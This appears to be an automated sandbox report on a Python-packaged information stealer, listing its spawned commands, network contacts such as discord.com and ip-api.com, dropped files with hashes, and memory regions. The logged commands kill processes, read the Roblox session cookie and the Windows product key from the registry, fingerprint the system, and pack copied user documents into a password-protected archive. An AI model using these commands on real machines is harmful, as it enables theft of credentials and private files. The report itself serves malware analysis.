C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A26.tmp" "c:\Users\Admin\AppData\Local\Temp\g3r3edbo\CSC7475927B5FA544FAAE383FF4EB69754.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 684"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 684
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2496"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2496
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2280"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2280
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 408"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 408
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3436"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3436
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2524"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2524
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4288"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4288
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29282\rar.exe a -r -hp"Tiger305." "C:\Users\Admin\AppData\Local\Temp\Ztf1g.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI29282\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI29282\rar.exe a -r -hp"Tiger305." "C:\Users\Admin\AppData\Local\Temp\Ztf1g.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
Network
| Country | Destination | Domain | Proto |
| GB | 142.250.187.234:443 | tcp | |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| FR | 142.250.178.131:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 131.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.131.50.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI29282\python311.dll
| MD5 | 1e76961ca11f929e4213fca8272d0194 |
| SHA1 | e52763b7ba970c3b14554065f8c2404112f53596 |
| SHA256 | 8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0 |
| SHA512 | ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b |
memory/1604-24-0x00007FFD3FCB0000-0x00007FFD4029A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI29282\VCRUNTIME140.dll
| MD5 | 870fea4e961e2fbd00110d3783e529be |
| SHA1 | a948e65c6f73d7da4ffde4e8533c098a00cc7311 |
| SHA256 | 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644 |
| SHA512 | 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88 |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\base_library.zip
| MD5 | 2efeab81308c47666dfffc980b9fe559 |
| SHA1 | 8fbb7bbdb97e888220df45cc5732595961dbe067 |
| SHA256 | a20eeb4ba2069863d40e4feab2136ca5be183887b6368e32f1a12c780a5af1ad |
| SHA512 | 39b030931a7a5940edc40607dcc9da7ca1bf479e34ebf45a1623a67d38b98eb4337b047cc8261038d27ed9e9d6f2b120abbf140c6c90d866cdba0a4c810ac32c |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\_ctypes.pyd
| MD5 | 7ecc651b0bcf9b93747a710d67f6c457 |
| SHA1 | ebb6dcd3998af9fff869184017f2106d7a9c18f3 |
| SHA256 | b43963b0883ba2e99f2b7dd2110d33063071656c35e6575fca203595c1c32b1a |
| SHA512 | 1ff4837e100bc76f08f4f2e9a7314bcaf23ebfa4f9a82dc97615cde1f3d29416004c6346e51afc6e61360573df5fcd2a3b692fd544ccad5c616fb63ac49303c5 |
memory/1604-30-0x00007FFD50C80000-0x00007FFD50CA3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI29282\libffi-8.dll
| MD5 | 87786718f8c46d4b870f46bcb9df7499 |
| SHA1 | a63098aabe72a3ed58def0b59f5671f2fd58650b |
| SHA256 | 1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33 |
| SHA512 | 3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7 |
memory/1604-48-0x00007FFD51A80000-0x00007FFD51A8F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI29282\_ssl.pyd
| MD5 | 8f94142c7b4015e780011c1b883a2b2f |
| SHA1 | c9c3c1277cca1e8fe8db366ca0ecb4a264048f05 |
| SHA256 | 8b6c028a327e887f1b2ccd35661c4c7c499160e0680ca193b5c818327a72838c |
| SHA512 | 7e29163a83601ed1078c03004b3d40542e261fda3b15f22c2feec2531b05254189ae1809c71f9df78a460bf2282635e2287617f2992b6b101854ddd74fcad143 |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\_sqlite3.pyd
| MD5 | 72a0715cb59c5a84a9d232c95f45bf57 |
| SHA1 | 3ed02aa8c18f793e7d16cc476348c10ce259feb7 |
| SHA256 | d125e113e69a49e46c5534040080bdb35b403eb4ff4e74abf963bce84a6c26ad |
| SHA512 | 73c0e768ee0c2e6ac660338d2268540254efe44901e17271595f20f335ada3a9a8af70845e8a253d83a848d800145f7ecb23c92be90e7dd6e5400f72122d09de |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\_socket.pyd
| MD5 | 57dc6a74a8f2faaca1ba5d330d7c8b4b |
| SHA1 | 905d90741342ac566b02808ad0f69e552bb08930 |
| SHA256 | 5b73b9ea327f7fb4cefddd65d6050cdec2832e2e634fcbf4e98e0f28d75ad7ca |
| SHA512 | 5e2b882fc51f48c469041028b01f6e2bfaf5a49005ade7e82acb375709e74ad49e13d04fd7acb6c0dbe05f06e9966a94753874132baf87858e1a71dcffc1dc07 |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\_queue.pyd
| MD5 | f1e7c157b687c7e041deadd112d61316 |
| SHA1 | 2a7445173518a342d2e39b19825cf3e3c839a5fe |
| SHA256 | d92eadb90aed96acb5fac03bc79553f4549035ea2e9d03713d420c236cd37339 |
| SHA512 | 982fd974e5892af9f360dc4c7ccaa59928e395ccef8ea675fadb4cf5f16b29350bf44c91ea1fd58d90cbca02522eba9543162e19c38817edbfd118bc254515da |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\_lzma.pyd
| MD5 | 71f0b9f90aa4bb5e605df0ea58673578 |
| SHA1 | c7c01a11b47dc6a447c7475ef6ba7dec7c7ba24e |
| SHA256 | d0e10445281cf3195c2a1aa4e0e937d69cae07c492b74c9c796498db33e9f535 |
| SHA512 | fc63b8b48d6786caecaf1aa3936e5f2d8fcf44a5a735f56c4200bc639d0cb9c367151a7626aa5384f6fc126a2bd0f068f43fd79277d7ec9adfc4dcb4b8398ae2 |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\_hashlib.pyd
| MD5 | 7edb6c172c0e44913e166abb50e6fba6 |
| SHA1 | 3f8c7d0ff8981d49843372572f93a6923f61e8ed |
| SHA256 | 258ad0d7e8b2333b4b260530e14ebe6abd12cae0316c4549e276301e5865b531 |
| SHA512 | 2a59cc13a151d8800a29b4f9657165027e5bf62be1d13c2e12529ef6b7674657435bfd3cc16500b2aa7ce95b405791dd007c01adf4cdd229746bd2218bfdc03f |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\_decimal.pyd
| MD5 | 0cfe09615338c6450ac48dd386f545fd |
| SHA1 | 61f5bd7d90ec51e4033956e9ae1cfde9dc2544fe |
| SHA256 | a0fa3ad93f98f523d189a8de951e42f70cc1446793098151fc50ba6b5565f2e3 |
| SHA512 | 42b293e58638074ce950775f5ef10ec1a0bb5980d0df74ad89907a17f7016d68e56c6ded1338e9d04d19651f48448deee33a0657d3c03adba89406d6e5f10c18 |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\_bz2.pyd
| MD5 | 83b5d1943ac896a785da5343614b16bc |
| SHA1 | 9d94b7f374030fed7f6e876434907561a496f5d9 |
| SHA256 | bf79ddbfa1cc4df7987224ee604c71d9e8e7775b9109bf4ff666af189d89398a |
| SHA512 | 5e7dcc80ac85bd6dfc4075863731ea8da82edbb3f8ffafba7b235660a1bd0c60f7dfde2f7e835379388de277f9c1ceae7f209495f868cb2bd7db0de16495633c |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\unicodedata.pyd
| MD5 | 908e8c719267692de04434ab9527f16e |
| SHA1 | 5657def35fbd3e5e088853f805eddd6b7b2b3ce9 |
| SHA256 | 4337d02a4b24467a48b37f1ccbcebd1476ff10bdb6511fbb80030bbe45a25239 |
| SHA512 | 4f9912803f1fa9f8a376f56e40a6608a0b398915b346d50b6539737f9b75d8e9a905beb5aace5fe69ba8847d815c600eb20330e79a2492168735b5cfdceff39a |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\sqlite3.dll
| MD5 | abe8eec6b8876ddad5a7d60640664f40 |
| SHA1 | 0b3b948a1a29548a73aaf8d8148ab97616210473 |
| SHA256 | 26fc80633494181388cf382f417389c59c28e9ffedde8c391d95eddb6840b20d |
| SHA512 | de978d97c04bad9ebb3f423210cbcb1b78a07c21daadc5c166e00206ece8dcd7baac1d67c84923c9cc79c8b9dfbec719ce7b5f17343a069527bba1a4d0454c29 |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\select.pyd
| MD5 | 938c814cc992fe0ba83c6f0c78d93d3f |
| SHA1 | e7c97e733826e53ff5f1317b947bb3ef76adb520 |
| SHA256 | 9c9b62c84c2373ba509c42adbca01ad184cd525a81ccbcc92991e0f84735696e |
| SHA512 | 2f175f575e49de4b8b820171565aedb7474d52ae9914e0a541d994ff9fea38971dd5a34ee30cc570920b8618393fc40ab08699af731005542e02a6a0095691f0 |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\libssl-1_1.dll
| MD5 | 7bcb0f97635b91097398fd1b7410b3bc |
| SHA1 | 7d4fc6b820c465d46f934a5610bc215263ee6d3e |
| SHA256 | abe8267f399a803224a1f3c737bca14dee2166ba43c1221950e2fbce1314479e |
| SHA512 | 835bab65d00884912307694c36066528e7b21f3b6e7a1b9c90d4da385334388af24540b9d7a9171e89a4802612a8b6523c77f4752c052bf47adbd6839bc4b92c |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\libcrypto-1_1.dll
| MD5 | e5aecaf59c67d6dd7c7979dfb49ed3b0 |
| SHA1 | b0a292065e1b3875f015277b90d183b875451450 |
| SHA256 | 9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1 |
| SHA512 | 145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4 |
C:\Users\Admin\AppData\Local\Temp\_MEI29282\blank.aes
| MD5 | 973dfed4accba4ef661d6ead0a66d340 |
| SHA1 | 0d71b5679e97e5c78906d7369a62ef0ce7b0d31c |
| SHA256 | b3babe6ed915074ec6b1c1a6be201a049c376757a6cd6819f40e93fd56aeb30f |
| SHA512 | 403ddd2de17306e5e8675364e8675bd1ac4419a2cf2ae441ac13c3c2febd8f522e73a69b8a6332c25bf288d5c7d776d5acc53a34a302c6baeeed261b54108653 |
memory/1604-54-0x00007FFD50C50000-0x00007FFD50C7D000-memory.dmp
memory/1604-56-0x00007FFD50F00000-0x00007FFD50F19000-memory.dmp
memory/1604-58-0x00007FFD50900000-0x00007FFD50923000-memory.dmp
memory/1604-60-0x00007FFD505A0000-0x00007FFD5070F000-memory.dmp
memory/1604-62-0x00007FFD50C30000-0x00007FFD50C49000-memory.dmp
memory/1604-64-0x00007FFD50FB0000-0x00007FFD50FBD000-memory.dmp
memory/1604-66-0x00007FFD50800000-0x00007FFD5082E000-memory.dmp
memory/1604-68-0x00007FFD3FCB0000-0x00007FFD4029A000-memory.dmp
memory/1604-69-0x00007FFD4B090000-0x00007FFD4B148000-memory.dmp
memory/1604-72-0x00007FFD50C80000-0x00007FFD50CA3000-memory.dmp
memory/1604-73-0x00007FFD3F930000-0x00007FFD3FCA5000-memory.dmp
memory/1604-74-0x00000253EF5B0000-0x00000253EF925000-memory.dmp
memory/1604-76-0x00007FFD50A10000-0x00007FFD50A24000-memory.dmp
memory/1604-78-0x00007FFD507F0000-0x00007FFD507FD000-memory.dmp
memory/1604-80-0x00007FFD3F6D0000-0x00007FFD3F7EC000-memory.dmp
memory/1604-81-0x00007FFD50900000-0x00007FFD50923000-memory.dmp
memory/848-82-0x00007FFD3EC03000-0x00007FFD3EC05000-memory.dmp
memory/1604-83-0x00007FFD505A0000-0x00007FFD5070F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_35m3dunv.nr2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1604-90-0x00007FFD50C30000-0x00007FFD50C49000-memory.dmp
memory/848-89-0x00007FFD3EC00000-0x00007FFD3F6C1000-memory.dmp
memory/848-91-0x00007FFD3EC00000-0x00007FFD3F6C1000-memory.dmp
memory/848-92-0x0000028A44410000-0x0000028A44432000-memory.dmp
memory/5932-181-0x0000023B49440000-0x0000023B49441000-memory.dmp
memory/5932-179-0x0000023B49440000-0x0000023B49441000-memory.dmp
memory/5932-180-0x0000023B49440000-0x0000023B49441000-memory.dmp
memory/5932-191-0x0000023B49440000-0x0000023B49441000-memory.dmp
memory/5932-190-0x0000023B49440000-0x0000023B49441000-memory.dmp
memory/5932-189-0x0000023B49440000-0x0000023B49441000-memory.dmp
memory/5932-188-0x0000023B49440000-0x0000023B49441000-memory.dmp
memory/5932-187-0x0000023B49440000-0x0000023B49441000-memory.dmp
memory/5932-186-0x0000023B49440000-0x0000023B49441000-memory.dmp
memory/5932-185-0x0000023B49440000-0x0000023B49441000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\g3r3edbo\g3r3edbo.cmdline
| MD5 | e2db2f44c99f7e9bdf1344170fdca0b1 |
| SHA1 | c10d72bdc28449a0c371d8eff995e33ced6b1546 |
| SHA256 | 5498da4b672ef99304945649ebd6a02e813c74102c06a4e77058f7490a215883 |
| SHA512 | 53e0d8e10ee435034154d8185cc8403ee27d440c58f89d2a5512b316ace854a112fde89e7ed11dd23bd84ddd434f2c0ba0c9d6eec540a3a2e8be062e0e2ba969 |
\??\c:\Users\Admin\AppData\Local\Temp\g3r3edbo\g3r3edbo.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
memory/1604-214-0x00007FFD3F930000-0x00007FFD3FCA5000-memory.dmp
memory/1604-213-0x00007FFD4B090000-0x00007FFD4B148000-memory.dmp
memory/1604-212-0x00007FFD50800000-0x00007FFD5082E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RES3A26.tmp
| MD5 | eec34d214f7c5c4ba968813dec9eecdd |
| SHA1 | 23520e6275b0a23f65a72f1153f9f5f9f2efda5e |
| SHA256 | 69c9720f0709660bc9691b82be74c996c6e2d274c4824f11fea2b4aead3768b6 |
| SHA512 | 8ebc7566bcd1bfdb4e8a6105f57e0d9926557d211e6dc2b2470bc50bc99292329104acb1f6c68bb05569c16c867f91f6cd493e24590657233d2bcd5003c874d5 |
\??\c:\Users\Admin\AppData\Local\Temp\g3r3edbo\CSC7475927B5FA544FAAE383FF4EB69754.TMP
| MD5 | 8d161365af3f25e8180f2f9110750e9c |
| SHA1 | 6849159eb2e256ae9c6783c076b6832049144951 |
| SHA256 | 3dc9a1a538c1a833173897015853e368eb7b4394d8f5357ebbd71330a775f2c4 |
| SHA512 | 3762f9de64d03f13bb4f8fcf8690e63172d095b6cf14b62efae619b6b51312ffd96b80a3c330a2515ddd46eab47b41a0ddf0f25c326215cdb6e7e126c3597f91 |
memory/1604-203-0x00007FFD3FCB0000-0x00007FFD4029A000-memory.dmp
memory/5156-223-0x00000275F5C00000-0x00000275F5C08000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\g3r3edbo\g3r3edbo.dll
| MD5 | fa7189e10254d981400fb634fdd4e962 |
| SHA1 | 527f82e8b7a38b14dc3b24572fea8472b66024ab |
| SHA256 | 93726b3aa24393ab02d3a0dab639f906d97edac047c71b300c0b4d31cdcf01c3 |
| SHA512 | 90d73f84655428873eb52f3e687c3e0fb7bf5e50ebc15ba01818e84c409c3227ab5c29b6bba357d51e730b2c4a4b239dbee1486eab26da3b60c16e192d6b81b1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | aaaac7c68d2b7997ed502c26fd9f65c2 |
| SHA1 | 7c5a3731300d672bf53c43e2f9e951c745f7fbdf |
| SHA256 | 8724dc2c3c8e8f17aeefae44a23741b1ea3b43c490fbc52fd61575ffe1cd82bb |
| SHA512 | c526febd9430413b48bed976edd9a795793ad1f06c8ff4f6b768b4ad63f4d2f06b9da72d4fcfa7cb9530a64e2dc3554f5ad97fd0ab60129701d175f2724ef1ac |
memory/1604-204-0x00007FFD50C80000-0x00007FFD50CA3000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8740e7db6a0d290c198447b1f16d5281 |
| SHA1 | ab54460bb918f4af8a651317c8b53a8f6bfb70cd |
| SHA256 | f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5 |
| SHA512 | d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bd5940f08d0be56e65e5f2aaf47c538e |
| SHA1 | d7e31b87866e5e383ab5499da64aba50f03e8443 |
| SHA256 | 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6 |
| SHA512 | c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406 |
memory/848-230-0x00007FFD3EC00000-0x00007FFD3F6C1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 23d3948ac217212bbecd71da1d06db0b |
| SHA1 | a1368d24c77fe7c7f18b7a12ef25c6ae31389bf3 |
| SHA256 | b0f6b9cc9b74d022850c8b90dbd660e7eb57a6e643bc1190803ae6719b2eb841 |
| SHA512 | 0e082892b6e73b053dda3b07629ce58347627a13faf884698f36e43615bbc9200d79d33f4b025683b03e08dba67f4d5279729e58cae755baa282f88c9fa2f9d0 |
memory/1604-259-0x00007FFD505A0000-0x00007FFD5070F000-memory.dmp
memory/1604-254-0x00007FFD50C80000-0x00007FFD50CA3000-memory.dmp
memory/1604-253-0x00007FFD3FCB0000-0x00007FFD4029A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d3235ed022a42ec4338123ab87144afa |
| SHA1 | 5058608bc0deb720a585a2304a8f7cf63a50a315 |
| SHA256 | 10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27 |
| SHA512 | 236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf |
memory/1604-306-0x00000253EF5B0000-0x00000253EF925000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\BackupUnregister.mpv2
| MD5 | 6a1117d45d6c964c88017074e97091ae |
| SHA1 | d18cf64c6909d652775037e9471bab5e4ad048ac |
| SHA256 | 1c05cb19fe81b940792cc08fe65938e76aba549e1e980061410efb3aa1f98fcf |
| SHA512 | 18a28cab9f8336eb6fe3c35322df66670f48a05987c0991445f8ec9f2988f73db4ca0249058b1a7407ac90621d357da4cc16c54a78ce6bceef069c0100f84cdb |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\WriteWatch.png
| MD5 | 4a6da03950f64366c9e9fde6d197f6c4 |
| SHA1 | df3d4f623a464189e7d7452d15b5025e65e386cf |
| SHA256 | e001520638d6783829062b3b5c1f289f3cd417bfef30cb7f98dddcfb41c42341 |
| SHA512 | 88ec63a4845054c9ae024cfe8d6ff914588eb9ec04f5829499d83c11236d41a66adde23fd6997fccd92137854eb84a5fd8771558fa9fdde66bb2968569c3c314 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\ClearApprove.docx
| MD5 | 5fb4c8bfd41d98068d2a87bf19ce4e70 |
| SHA1 | 7e8d773375554510034cf8723dc5cc240ebff81f |
| SHA256 | 329b6b521599e8703be1d0ed98219ab75f10f3c3d15b80566d84ca5e48a0c903 |
| SHA512 | 83a5ff79f93bcb4586b1fb1ba508f98c4dc12795a09838973df00b3d52df247c097c2b95ee4588b91c1895cd0d94389adb58c1956b2bb3e860eaf11fd0a4b2d9 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\CopyTest.doc
| MD5 | 2c36f85027e8452d4732c89b20044a9f |
| SHA1 | e13ee60a79e0a4baf3a6c987c308abf934b548b8 |
| SHA256 | e9f70b9d4a203eab059964b8838522d4f35acda7c738e43eac292145a36ae576 |
| SHA512 | b80fc382f2b2b8e996fa6cd12a589be27bd41edd6ec9062597b98fb37c2c1079513dfde6f654f966270e8069f3bd46a65a20f25afc438c5dc80dc5be48cbc4ca |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\FormatMove.xls
| MD5 | fa4a667098422be0c2a29f9f9d03d09a |
| SHA1 | 15828491b1c3324db3da23987de37ee7884e2186 |
| SHA256 | 52dc2b9bb9aa75b58b08dc56c5ac56450c565df54205ef8fc9c85b0b91d6abd8 |
| SHA512 | acdec4fb07cd75d340b1df7646b21a764681d1468ac5e38e0bb325f8c0ab0a6414f185b4d236d19efec58b6f31642131e33511eaa968113bba7aabcec1eb9ac1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docx
| MD5 | 4a8fbd593a733fc669169d614021185b |
| SHA1 | 166e66575715d4c52bcb471c09bdbc5a9bb2f615 |
| SHA256 | 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42 |
| SHA512 | 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docx
| MD5 | bfbc1a403197ac8cfc95638c2da2cf0e |
| SHA1 | 634658f4dd9747e87fa540f5ba47e218acfc8af2 |
| SHA256 | 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6 |
| SHA512 | b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\OutStep.txt
